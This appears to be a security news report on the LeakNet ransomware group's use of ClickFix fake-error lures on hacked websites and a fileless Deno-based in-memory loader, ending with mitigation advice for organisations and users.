A ransomware group known as LeakNet has been observed using a social engineering tactic called ClickFix, delivered through hacked websites, to gain initial access to victim systems. This method represents a shift from the group’s previous reliance on stolen credentials and other traditional intrusion techniques.
The ClickFix tactic involves tricking users into manually executing malicious commands. Victims are presented with fake error messages on compromised websites, which instruct them to run specific commands in their system’s command prompt or terminal to supposedly fix the issue. By complying, users inadvertently download and execute the ransomware payload themselves.
Technical Execution and In-Memory Loading
Following the initial ClickFix compromise, the LeakNet operation deploys a sophisticated in-memory loader built on the Deno JavaScript/TypeScript runtime. This loader operates directly in the computer’s memory, or RAM, without writing a malicious file to the disk. This fileless execution technique is designed to evade traditional antivirus and endpoint detection software that typically scans for suspicious files on the hard drive.
The use of Deno, a modern runtime environment, is notable. It allows the attackers to leverage a legitimate, trusted system tool to run malicious scripts, further complicating detection efforts for security teams. The in-memory loader then facilitates the final stage of the attack: the deployment of the LeakNet ransomware, which encrypts the victim’s files and demands payment for their decryption.
Significance of the Attack Vector
This campaign highlights a concerning evolution in ransomware delivery methods. By combining a low-tech social engineering ploy with a high-tech, fileless loader, attackers are targeting the human element while simultaneously employing advanced evasion tactics. The compromise of legitimate websites to host the ClickFix lures increases the perceived legitimacy of the fake error messages, making the scam more convincing to potential victims.
Security analysts note that this approach reduces the attackers’ dependency on exploiting software vulnerabilities or purchasing access from initial access brokers. Instead, it directly manipulates user behavior, relying on a moment of confusion or urgency to bypass technical security controls.
Recommendations for Mitigation
Organizations and individuals are advised to exercise extreme caution when encountering unsolicited error messages or instructions to run commands, especially those presented on websites. Users should never run commands suggested by pop-up warnings or unfamiliar sites. Regular security awareness training is critical to help staff recognize such social engineering attempts.
From a technical standpoint, security teams should monitor for unusual Deno runtime activity and implement application allowlisting policies where feasible. Endpoint Detection and Response (EDR) solutions capable of monitoring for malicious in-memory activity and suspicious process behavior are also recommended to counter these fileless threats.
Looking ahead, security researchers anticipate that other ransomware groups may adopt similar hybrid tactics, blending simple deception with advanced technical execution. The continued monitoring of compromised websites for such lures, along with increased industry collaboration to share indicators of compromise, will be essential in disrupting this emerging threat pattern.
Source: Original security research reports
